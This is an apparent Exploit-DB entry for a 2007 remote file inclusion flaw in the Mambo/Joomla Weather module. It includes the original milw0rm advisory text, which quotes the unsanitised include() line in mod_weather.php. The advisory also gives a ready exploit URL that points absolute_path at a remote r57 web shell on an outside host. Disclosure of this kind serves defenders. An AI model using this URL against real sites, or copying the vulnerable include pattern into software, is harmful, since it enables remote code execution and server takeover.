Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln

vendor:

Module Weather

by:

Cold z3ro

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Module Weather

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln

The Mambo/Joomla Module Weather is vulnerable to remote file inclusion. The vulnerability allows an attacker to include a remote file using the 'absolute_path' parameter in the 'mod_weather.php' script. This can lead to arbitrary code execution or disclosure of sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the module or apply a patch provided by the vendor.

Source

Exploit-DB raw data:

============================================================
Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln
============================================================
Found By : Cold z3ro , Cold-z3ro@Hotmail.com
============================================================
Homepage: www.Hack-Teach.com
============================================================
Script :
http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,47/chk,a39037e15bb5cd125f3cfd9dccaec6f5/no_html,1.html
============================================================
File : /mod_weather.php
include($absolute_path.'/language/'.$lang.'/lang_mod_weather.php');
============================================================
http://site/{path}/modules/mod_weather.php?absolute_path=http://nachrichtenmann.de/r57.txt?
============================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]